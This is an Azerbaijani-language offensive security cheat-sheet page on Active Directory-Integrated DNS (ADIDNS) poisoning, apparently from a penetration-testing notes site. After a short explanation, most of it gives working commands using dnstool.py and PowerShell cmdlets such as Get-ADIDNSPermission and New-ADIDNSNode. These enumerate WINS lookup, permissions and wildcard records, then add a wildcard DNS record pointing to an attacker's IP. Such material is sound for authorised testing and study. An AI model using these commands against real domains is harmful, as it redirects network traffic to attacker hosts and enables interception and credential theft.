Abusing Active Directory-Integraded DNS (ADIDNS) poisoning

Abusing Active Directory-Integraded DNS

ADIDNS nədir?

Active Directory Integrated DNS (ADIDNS) Active Directory (AD) mühitində istifadə edilən və AD infrastrukturuna inteqrasiya olunmuş DNS xidmətidir. Bu, DNS xidmətini Active Directory-nin bir hissəsi kimi təqdim edir və AD-nin üstünlüklərini DNS xidmətinə inteqrasiya edir.

ADİDNS poisoning nədir?

ADIDNS zəhərlənməsi Active Directory Integrated DNS (ADIDNS) istifadə edərək həyata keçirilən DNS zəhərlənməsi hücumunun bir növüdür. Bu hücum DNS qeydlərini manipulyasiya etməklə və yalan məlumat yaymaqla həyata keçirilir.

Bu tip hücumda təcavüzkarlar adətən DNS serverlərinə və ya Active Directory inteqrasiya edilmiş DNS sisteminə daxil olur və bu sistemdəki qeydləri dəyişdirir və ya saxta qeydlər əlavə edirlər. Bu, istifadəçiləri çaşdırmaq və ya şəbəkə trafikini təcavüzkar tərəfindən idarə olunan serverlərə yönləndirmək üçün edilə bilər.

Bir çox sistemdən eyni LLMNR/NBNS sorğusunu aşkar etsəniz, uyğun qeyd ADIDNS-ə əlavə edilə bilər. Sistemlər artıq DNS-də olmayan köhnə hostlar üçün LLMNR/NBNS sorğuları göndərdikdə bu effektiv ola bilər. Əgər alt şəbəkə daxilində bir neçə sistem xüsusi adları həll etməyə çalışırsa, kənar sistemlər də cəhd edə bilər. Bu ssenaridə ADIDNS-ə inyeksiya etmək hücumun alt şəbəkə sərhədindən kənara çıxmasına kömək edəcək.

WINS forward lookup

WINS irəli axtarış vəziyyəti dnstool.py (Python) ilə sadalana bilər. 65281 giriş növü (yəni "WINS") WINS irəli axtarışı aktivləşdirildikdə mövcud olacaq.

dnstool.py -u 'DOMAIN\USER' -p 'PASSWORD' --record '@' --action 'query' <DC IP>

dnstool.py -u 'DOMAIN\USER' -p 'PASSWORD' --record '@' --action 'query' <DC IP> | grep "WINS\|65281"

ADIDNS icazələrini yoxlanılması

Defolt olaraq autentifikasiya edilmiş istifadəçilər CreateChild icazələrinə malikdirlər.

Get-ADIDNSPermission

Get-ADIDNSPermission | Where-Object -Property IdentityReference -EQ S-1-5-11 | Where-Object -Property ActiveDirectoryRights -EQ CreateChild

Wildcard qeydlərinin yoxlanılması

DNS serveri zonada olan qeydlərə açıq şəkildə uyğun gəlməyən ad sorğularına cavab vermək üçün “wildcard” qeydindən istifadə edəcək. Mövcud olmadıqda xəta verir.

Get-ADIDNSNodeAttribute -Node * -Attribute DNSRecord

Get-ADIDNSNodeAttribute -Node * -Attribute DNSRecord -Partition System
Get-ADIDNSNodeAttribute -Node * -Attribute DNSRecord -Partition ForestDNSZones
dnstool.py -u 'DOMAIN\USER' -p 'PASSWORD' --record '*' --action 'query' <DC IP>
dnstool.py -u 'DOMAIN\USER' -p 'PASSWORD' --record '*' --action 'query' <DC IP> --legacy
dnstool.py -u 'DOMAIN\USER' -p 'PASSWORD' --record '*' --action 'query' <DC IP> --forest
dnstool.py -u 'DOMAIN\USER' -p 'PASSWORD' --record '*' --action 'query' <DC IP> --partition

Windcart qeydinin yaradılası

Varsayılan olaraq, saytlar arasında təkrarlama üç saata qədər çəkə bilər.

Təsdiqlənmiş hər hansı bir istifadəçi qovşaq modifikasiyalarını həyata keçirə bilməsi üçün

-Tombstone istifadə edin

New-ADIDNSNode -Node * -Data <ATTACKER IP> -Verbose

New-ADIDNSNode -Node * -Data <ATTACKER IP> -Verbose -Tombstone

dnstool.py -u 'DOMAIN\USER' -p 'PASSWORD' --record '*' --action add --data <ATTACKER IP> <DC IP>
PreviousDNSAdmins AbuseNextAbusing Backup Operators Group

Last updated